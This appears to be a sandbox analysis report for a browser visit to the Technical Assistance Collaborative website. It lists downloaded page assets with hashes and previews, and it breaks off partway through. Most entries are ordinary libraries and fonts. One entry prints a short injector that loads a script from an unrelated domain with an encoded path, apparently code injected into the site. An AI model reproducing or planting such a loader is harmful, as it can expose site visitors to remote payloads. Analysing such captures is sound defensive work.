                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.. // OPEN HTML //-->.<html lang="en-US" >.. // OPEN HEAD //-->.<head>. . <link rel="preload" href="https://www.tacinc.org/wp-content/themes/socialdriver/css/fonts/fontawesome-webfont.woff2?v=4.3.0" as="font" type="font/woff2" crossorigin>. <link rel="preload" href="https://www.tacinc.org/wp-content/themes/socialdriver/css/fonts/ss-gizmo.woff" as="font" type="font/woff" crossorigin>.. . <title>The Technical Assistance Collaborative - TAC</title>.. <meta charset="UTF-8"/>. . <meta name="viewport" content="width=device-width, initial-scale=1"/>. <meta name="apple-mobile-web-app-title". content="Technical Assistance Collaborative">. . // PINGBACK & FAVICON //-->. <link rel="shortcut icon" href="https://www.tacinc.org/wp-content/uploads/2020/11/favicon32.png" />. <link rel="apple-touch-icon" sizes="144x144". href="https://www.tacinc.org/wp-content/uploads/2020/11/
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65496)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80657
                                                                                                                                                                                                                              Entropy (8bit):5.173890525978993
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:4eAjA679C+QRNtewmXC4WHqMPBWPbx84XwCRfYNQAzeLHeBHmjknzRNS4cR8+StQ:2wmJjAOIOV2BCWju0ELv
                                                                                                                                                                                                                              MD5:65B14E77A11C2BAFFCA6E3BC0EBC4598
                                                                                                                                                                                                                              SHA1:41411F5E9440995A516347CDEBCB5465ABE5FFA1
                                                                                                                                                                                                                              SHA-256:E76FE1DDF34B81940A8C974FC571B1C51A778C80D826FBA7DEE495582630E26B
                                                                                                                                                                                                                              SHA-512:5FB3A081097A60551F31A2BEF8D25CB4AE5070B8E98A2A2E27C7E348C49EA1ECF9ECCA31DE767485E8F1E466C7AD2600DCD54D2DDA93AC59A9425EBAE5262AA7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={};const e=elementor.settings.page.model;jQuery.each(e.getActiveControls(),(n=>{t[n]=e.attributes[n]}))}else t=this.$element.data("elementor-sett
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (41281)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):41321
                                                                                                                                                                                                                              Entropy (8bit):5.277045082197564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ERxjjLRkR68ZvxH2Ea/AfjSfufVgLIH1/QlKEAzBc5G8TSebsvT2C8UlBSB5oodA:ERxvLRkR681xH2EanufVtfEAzBc5TTS9
                                                                                                                                                                                                                              MD5:650F6D97D5EFB2781F897B385C4C94A0
                                                                                                                                                                                                                              SHA1:D2C05E33461656F84CF31CE29AB51AEF79A6B561
                                                                                                                                                                                                                              SHA-256:D4A6A819218B18C9BD0095D7BA200469AC95A835CA55DA1F8374B520407F5F59
                                                                                                                                                                                                                              SHA-512:FD9614E07A5C067C51EAF86FD79B4601463DBCB5AAAF7FA60390BED76DB48DCAD61DB151DA6506858B29D9D68AB9D19CC40D3A0E2D7B6CFBB98805BF072D89C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/js/frontend.min.js
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var o=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=o(n(8135));class _default extends elementorModules.ViewModule{constructor(){super(...arguments),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,o=t.elementorType,s=this.documentClasses[o]||this.documentClasses.base;this.documents[
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):238
                                                                                                                                                                                                                              Entropy (8bit):6.6137055755299885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPTIuTQ9Tgel3J46ZFZFbfAa8UI5lJM8hBX9e0ajp:6v/77FQOel3lfCA8hK
                                                                                                                                                                                                                              MD5:A3137006150E6903D7003FDE8A6F57F6
                                                                                                                                                                                                                              SHA1:3FB6A40D893BF6F5306470231A2E67C1DF009B31
                                                                                                                                                                                                                              SHA-256:C7843F5FCE1215BC344EBC5306501A65EF3979258898CBD1FE4E5A1E6E053629
                                                                                                                                                                                                                              SHA-512:EA910B9424F474A282DB9526F69DB33F416634EA3EC19783F2E948DDC60D797650556D05865131D96404BE5EC97B6F5AA20998AE286B67F431A9E578C900B20C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.PNG........IHDR...(...(.....&.p.....IDATx...1..1......B ..C8F.%..!....\.J....w....6..=..l..e.L.....{.<g....jK_d..i.$.)..".)..".)..".).. .GRs$.Y.......pGD.Y.Q.....H...Rq.i9..#.9..#Y.H.@..~...)..".Yr.W 1..+...%n..no..%..].....IEND.B`.
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65405), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):101173
                                                                                                                                                                                                                              Entropy (8bit):5.275511830422301
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:URUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GK8rP7QK:MHNwcv9VBQpLl88SMBQ47GK8rPU+B
                                                                                                                                                                                                                              MD5:4F37101FF3EE8F069D1CA3852FFBBF18
                                                                                                                                                                                                                              SHA1:3B8EA9226CBC21FD30160E4D9BA42DFBF1F3D1DE
                                                                                                                                                                                                                              SHA-256:C4D4233A44F3AE1CEF58B97A2E551008E9A8A5403B1C26C67136A0A20F9C7EB1
                                                                                                                                                                                                                              SHA-512:3903964C0EB415E1565CF07F9D46A06E5754C96D1A006491F64E79C8724AFE785EE426DE0D2E6ADCC53CAD0B0E947910C722B348AB9A016DD41D364C2B6C2102
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/f36d1c67b2b5257dc0a6c9820472d804.js
                                                                                                                                                                                                                              Preview:/**handles:jquery-core,jquery-migrate**/../*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18992, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):18992
                                                                                                                                                                                                                              Entropy (8bit):7.98821179325397
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:yQ5NgZVsy+J/IB0QTZJKN2BcCa0VDgDGNifxMCr5vg5ayq4wGj7yQpbmC6OM6OD:1/26VI59y2BTaeMzBStq8Mld
                                                                                                                                                                                                                              MD5:890138C6187C63745E5AEC895B69320E
                                                                                                                                                                                                                              SHA1:04B514F5FD1F25C8C780FE5EB735CFF83FEB6103
                                                                                                                                                                                                                              SHA-256:AD184B49AC89473D449848E9527102AEDC7AA3FFDF513C39754DB2DFDDED9802
                                                                                                                                                                                                                              SHA-512:93AF1D1BFC002F13BED0419468ACEC85DE8ADCA4BF2CD3F32889341CBC49D17C52DEA8A838C143383813FAF6E793B0262D0F18806D85973CA5B8D361BCC9C753
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/css/fonts/lora-v16-latin-600.woff2
                                                                                                                                                                                                                              Preview:wOF2......J0..........I...........................X..J....`?STAT6..r.......Q..`..6.$..,. .... ...g.%l.V...j4.^qd .8.0..FQ.I....I...M@..7"....0b....IZ..}GZ.p4.T.CH........-....@5 M.qJ8. qvg....e......?^.t.[.........+v.......d.d%..Y......x..>..L..> k..........+..5..}fk...]u3..Zg...1m[.l\w.y.>...6..A.......P..X!~.........G..r8A.*N"...9......n#Z......UZO...T..Z^f..:v...o;..cn./.k...5.t.%.&..-03.....V......"J.....h.....L.+..>.....:.O..{..p.w..._...P.P'...`7..3..pq$4...G.k...|..V.$1...D.jE.A..5Y........T.P .;....0.......P..W.....gvP..`.C>..iz.jY..7..S+./......,.....#..g..b,.O..P9.....z......+.w..X'..'..M.:..........5`..[.@.......S.a.a.fm..t.U..N.I.....[..c.-..~..$.o..ni...y.]...?..m.x.c'I/kY..m.3|..~...&).0.X.1b..q...F..D..~y...6......A..x.A..S9)1Ax._R1........<.s..C......H#(F....p,$q....l`...vv'I...nn{y......r..4....5.E..#z...<...4.....w............3.....S.._.z......,.@y%.p...t....2.pT."..nx.p.R.G........A...$.....v$...G.a...&.....z..1g
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 19364, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):19364
                                                                                                                                                                                                                              Entropy (8bit):7.987757496607874
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:S5Jqv1EsMjfqToEFSjtc8nRB7tBIBaIGojw42CNH4cwzf:ScEPa9Etc8RpIT5HG
                                                                                                                                                                                                                              MD5:89A93A1BDDE48C7BB104150DE88AFFCE
                                                                                                                                                                                                                              SHA1:18544EC48D6966331D0D3EFB1A5C745FF07DD206
                                                                                                                                                                                                                              SHA-256:B17FBF66D95264B84A6C435DE7AC98E5082F48E5ED65E6191314E19E7FADC62E
                                                                                                                                                                                                                              SHA-512:63F5D40A063C9632F6AEE593419B6DF84CE4C8537F4679D8298D5AF838507F75F323B6BAC22BDC38783DCA3EBB6E71E48F0C64BF4A1980C1099C651CF9359883
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-italic.woff2
                                                                                                                                                                                                                              Preview:wOF2......K..........KA.........................F.....l.`....@..s.....X..D..p..6.$..\. ..2..5..D.c...Vf..x..~.......&%?;P{.xI<...S.."......."A...4.S...}RZ>.4..a.S0......Z.*I.....\.Iu..y.k|.(."..8...:...4.IM..T.0c...87.....A..=..F.$'.....A;w._sG.3.J...dR........ ..&.(Q'h..h..jf..\t.f.*...5.(.h......D.$J...8h..m01.F.U..v.u.U..&........E$.1...>H.....:.'V.....Hb%...Q.!.....[3.....E..q.Ay....:......?J*...1;.{...}....2h..%.0..=..5..r..mJ.=.9Y..o.;...F.......8z.4.`.~7.=k...."*.Y....b4.ugE...K.........\....t<."...GJ.ecSaB.&.{..5."...r!.%....\P...(..zi...|v....Z..>..&..2..N_..Gp..7...s....1P....vjNSKn.F..&..FU.."......f..j^.z...d.).....2p.8..gZ.....i.t.:..G.D..".\9Q......0..ej..uc..7.Y..C..#..E.e..2.....4..K`wE.b.9.ZY.a...1./.&.].... ..(.......F.Z.M8@=V2..kry.JI1...."..... #F.l.P!.a..v.....N.l..9:p....d_/.?[./.......ZuT.UQ..1..#".........q....a.+...s......vXA.......(L.......,....2.J; {...v.r.=...*0.q.U....0ad.....o.....m0..hO.GF2.....#. .....+......<4B.7
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):233
                                                                                                                                                                                                                              Entropy (8bit):5.338658539888879
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:fO9gO9lfTRWF8tK8dGIdt2RvVTPT46VaR:GTfTRWF8tK8dVUVPvVaR
                                                                                                                                                                                                                              MD5:A6625B76F6A2632044E544FF887F32D5
                                                                                                                                                                                                                              SHA1:4A55406E63ED4AB8653A967ED7F01A65EBA93401
                                                                                                                                                                                                                              SHA-256:3960860ED9B76D13E5FEF1DE990D3F83165E4DB0C180E4D6D088D0B94BC2C3DC
                                                                                                                                                                                                                              SHA-512:0563BFBC16B0E8D199FEC3EDB3E0F1DF8F135E51E97AB0B978564F0E5934E1623A9B0B7AD72CDB6078CE0CAF36ACB1F206D2B51E1005F2017031FA7D39947DF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview: ;(function(l,h,n,g,o){g=l.createElement(h);o=l.getElementsByTagName(h)[0];g.async=1;g.src=n;o.parentNode.insertBefore(g,o);})(document,'script','https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==');
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 117372, version 773.768
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):117372
                                                                                                                                                                                                                              Entropy (8bit):7.990930658865595
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:3072:U3JKgVzg5ybfXYe5W59JPQaPWKSsx/DBMnVnqedkAFqPQTzIBIOK2vDMF:IVM5A5GJPQaH/NMtBkAvcnYF
                                                                                                                                                                                                                              MD5:B6356C957274676E6571C1FF5E11C9A8
                                                                                                                                                                                                                              SHA1:4022F95E001D734CA8F082B8E7627ABD205609EC
                                                                                                                                                                                                                              SHA-256:3A8924CD5203A28628716AEDB5CEF0943DA4C3B44E3FFCEE90AB06387B41C490
                                                                                                                                                                                                                              SHA-512:83DE79C74480FAFC62CDAC4012FF2A129D8701772EE16216C3D9488826AC21A9C2F8A416FE3208A61BFEA7E12C24AC1CC2D26F6D22BD2B0BA39A22D630238B59
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-brands-400.woff2
                                                                                                                                                                                                                              Preview:wOF2.......|.......=...1.........................6.$. .`..T..~..|.X.... %..q...<.....eD.i{.TUUo..... ...o..._............b............0..^ v.ju/.ea"dT*..O.....o.7.`.../..".e..#.2...?...`.C+..8U....K ."G....#Dv6-..;.....J..-.....X.PY....N.`.......K..G....^..G..<.$K..Y5...l._.U3..]..Y......=....;...Z.?$..+..........I....s2/!...#.....}#"#3."..W.Ev.4]M.-.R.| ...xG.....\.m...l...)m...l.......6.@B`......K..$.).;.....>............Zk...2.U..{uJ..mQ...o..m .D...A...'#$?.y..a.c..d2....^..<w.vf.gw.=.Y...{O..d.d..#............).E%qS...n.......x..M}?!.!..F*....sn.V..[..0u...;..=..Fj.2....4....F....'...V......G..i?.+iM..,..[k.k.snF..e..j.fU.7..Y..n...b..MFu.|....M1. .j...$..7...'nv#b.....#.....F..../.....T_.....c.o,o.....|#.olk.K+...2I._.Q!..b...=s..)$i..X.m....*..2....3.?..@M.[...3.iu..fi.....h.....|.^.(EC.2;..b.....5^...$.0.W.A.........P...`...'...._..}..P.j}m..V..P.%..'I.C..g.?..5.4.=o.....i...;~..Zy.".5y........!..>.e+p..yb.m....@.%K`.2.`.w-Qc..
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18798)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18833
                                                                                                                                                                                                                              Entropy (8bit):5.198890693042313
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:ivzwv2QYnTte0KKscI1WxUy/gdLzrXmJUDWjFkgoKjJj5Sh6W0+:WwOQ2te0KaYrXm1hR5Uz
                                                                                                                                                                                                                              MD5:F88D5720BB454ED5D204CBDB56901F6B
                                                                                                                                                                                                                              SHA1:F1952292FDE4B15936E9AAC16B2B9896684DB95B
                                                                                                                                                                                                                              SHA-256:726B820E44F6AB90AD991D30A4BF26D3A5D71493CBCD1FB1EFD0D14E89B9DF2A
                                                                                                                                                                                                                              SHA-512:F7E3EC0C5B832116D75CAC2A5A40AB6FE673CC6C0996BD898F25850ED5555484D821E1FC4CA039C69DA3AB51FAA25613D622DB1177D7CDE16DA477145C3A6E22
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! This file is auto-generated */.!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,t=n._,(e=n._=r()).noConflict=function(){return n._=t,e})}(this,function(){var n="1.13.6",r="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,F=Object.prototype,V="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=F.toString,q=F.hasOwnProperty,t="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=t&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 61248, version 0.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):61248
                                                                                                                                                                                                                              Entropy (8bit):7.99296149435912
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:1536:OvbpTi9iramxOmxOZopEn227quyjQZuarQ0dlN:OTk9SDxOYgopJuJ/B
                                                                                                                                                                                                                              MD5:EFECE30239A2068532699D1C0A37C4F3
                                                                                                                                                                                                                              SHA1:AB8544902C0A11417A14A6492E2613C23901F556
                                                                                                                                                                                                                              SHA-256:A008CCF1C8CC14ACDE946657CBBD710238DF2199BA88DB1049047596C1EFAE15
                                                                                                                                                                                                                              SHA-512:12B7A5E26C72DF573299A0BD66815DE4ADE34E7E134C3B99D5B59210D7E721D9D5629000C566A618EB80116FA3B5DEC6E6FA5DAD4CA8092A70B3FC49B8978DE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/css/fonts/ss-gizmo.woff
                                                                                                                                                                                                                              Preview:wOFF.......@................................FFTM...$........f.n.GDEF.......+...2....GPOS.......,...0....GSUB...D..5........OS/2.......F...`...cmap............'.Zggasp................glyf...........Bl.9head...X...1...6..O.hhea...........$.|..hmtx...........P....loca...............maxp........... ....name.............$]post...........&...ex.c`d``..y...m.2ps0...8.P....?.N... ....$..$..&...x.c`d`.h...$.........(.....t.F..x.c`d``.e.. ...L@......`>..%-...x.c`fob......j.r...a&.f:.........#2..87...A....0........f1a=......X.....x.U.?h.A..7........<...]....h..E..q.`.`....y.F.&(.DX.B...n.BA.X.b..B.*...d.o....?...}...>++A..P..;_..^a..=.g..&...YG..e...K.;..<........./.O.z.8=0..".e.A...%X%w..j.{`....:.?....=..x.:..j..2.^.k...r.....L..&U.........=;oW..c....p..T.$>...7..Aj..O.x...Y.%.j?...kl.......0?..Y.%}'WNT..V...5.!.gAf.*t...r......cQq.U.J..!.3..`..(...M..LL..k..Zg.g........y.9r.'v.2.p.d..z..S....&..F..:lny....v`.P2.O..g:Y........g:.5.../;....6D.Fw..p.....~..0.8.Em.
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (40345), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):109545
                                                                                                                                                                                                                              Entropy (8bit):5.180662363440504
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:WtttVxFm61ikpCQ9HuGH5iwqWWN7KOljuOzQYqE30/RuHRXrYPH0KOiNmv4K1YER:Eu8jbxw/5czCQ8+UR
                                                                                                                                                                                                                              MD5:978774F27C0A3F66C3AF8F53CC17668F
                                                                                                                                                                                                                              SHA1:18B591FD6DA50C2D0F39D11E67505D2DEFE1D82C
                                                                                                                                                                                                                              SHA-256:DA479E5E375AE5C35B054568A7CCFFF76F2D4E4601CEF59BBB020E004F772FBC
                                                                                                                                                                                                                              SHA-512:243C284B2D9720572233703350DDE3D020BF3E62A769A0D727225024C44E09281C280A0348716841440537281037E1A8BD4164447E21F9B323381BFEAE681CD1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/3f86132df1672ee9bc320961d8b32c63.js
                                                                                                                                                                                                                              Preview:/**handles:elementor-pro-frontend,pro-elements-handlers,pp-tooltipster,pp-elements-tooltip**/../*! elementor-pro - v3.24.0 - 09-10-2024 */.(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[313],{3e3:(e,t,n)=>{"use strict";var s=n(6784);n(2258);var i=s(n(4906)),o=s(n(2450)),r=s(n(4409)),a=s(n(7937)),l=s(n(8098)),c=s(n(6275)),d=s(n(3268)),u=s(n(4992));class ElementorProFrontend extends elementorModules.ViewModule{onInit(){super.onInit(),this.config=ElementorProFrontendConfig,this.modules={},this.initOnReadyComponents()}bindEvents(){jQuery(window).on("elementor/frontend/init",this.onElementorFrontendInit.bind(this))}initModules(){let e={motionFX:i.default,sticky:o.default,codeHighlight:r.default,videoPlaylist:a.default,payments:l.default,progressTracker:c.default};elementorProFrontend.trigger("elementor-pro/modules/init:before"),elementorProFrontend.trigger("elementor-pro/modules/init/before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):2576
                                                                                                                                                                                                                              Entropy (8bit):5.497494562418504
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:BOEAjxOEA0mFZMOEAlOEAyY3kOEAwuOEAGJc+u4OEAeN0xD:BOEAjxOEAzFZMOEAlOEAB3kOEADOEAGg
                                                                                                                                                                                                                              MD5:BE7F23AF319C4740605ACF1BB496F0AC
                                                                                                                                                                                                                              SHA1:279C647B23C70B72E2579DC63645263CF05C50A2
                                                                                                                                                                                                                              SHA-256:0965DB955D57D487D660DA00BEE8DD2CDCE2E7DE0FCEF6CA14EA83EA61693995
                                                                                                                                                                                                                              SHA-512:60E921E72CCA11C20A1B8B94F86D687171DD98382983001AC04FB141C2463F7609B456A87D0561CE24A4AD6EB0E945274F11E2479AFFCFDB61E99F81DA6D5DA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400&display=block&ver=1686239927
                                                                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Sans Pro';. font-style: normal;. font-weight: 400;. font-display: block;. src: url(https://fonts.gstatic.com/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNa7lqDY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Sans Pro';. font-style: normal;. font-weight: 400;. font-display: block;. src: url(https://fonts.gstatic.com/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qPK7lqDY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Source Sans Pro';. font-style: normal;. font-weight: 400;. font-display: block;. src: url(https://fonts.gstatic.com/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNK7lqDY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Source Sans Pro';. font
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10231), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10253
                                                                                                                                                                                                                              Entropy (8bit):5.102247543474495
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:C7X04gQXKccEOMfKvCiMmaF8LQZonSOVpo6Z8oC8sVyFcZ2ctuzr5u5o3Hg4:MhnabENfKvCiMmaF8LQynSOVpo6Zk8IE
                                                                                                                                                                                                                              MD5:663CE8825C9E0A6CE96CC0CD9AF66899
                                                                                                                                                                                                                              SHA1:CD6E1306D76F95DDBB59BF199C929151FE3F047F
                                                                                                                                                                                                                              SHA-256:FFF30A80415E9E849082ED1C758F521E52B4284B3C71E134B4CE15685F6A52F0
                                                                                                                                                                                                                              SHA-512:E76D16BEC2EA8A02AA0B1F0A72288CBF000DA13FA07AFEEC8E591130360B0B0DD7BDA6A1A9FBC2B9135D31AFF381DCA71E8D7840A9F3D2ABC181CB0E42247F5D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/**handles:ecspro**/..var EleCustomSkinSlider=elementorModules.frontend.handlers.Base.extend({getSkinPrefix:function e(){return"custom_"},getDefaultSettings:function e(){return{selectors:{carousel:".swiper-container",slideContent:".swiper-slide"}}},getDefaultElements:function e(){var t=this.getSettings("selectors"),n={$carousel:this.$element.find(t.carousel)};return n.$swiperSlides=n.$carousel.find(t.slideContent),n},getSlidesCount:function e(){return this.elements.$swiperSlides.length},getSwiperSettings:function e(){const n=this.getElementSettings(),t=+n[this.getSkinPrefix()+"slides_to_show"]||3,i=1===t,s=elementorFrontend.config.responsive.activeBreakpoints,o={mobile:1,tablet:i?1:2},r={slidesPerView:t,loop:"yes"===n[this.getSkinPrefix()+"infinite"],speed:n[this.getSkinPrefix()+"speed"],handleElementorBreakpoints:!0,breakpoints:{}};let a=t;Object.keys(s).reverse().forEach(e=>{var t=o[e]||a;r.breakpoints[s[e].value]={slidesPerView:+n[this.getSkinPrefix()+"slides_to_show_"+e]||t,slidesP
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
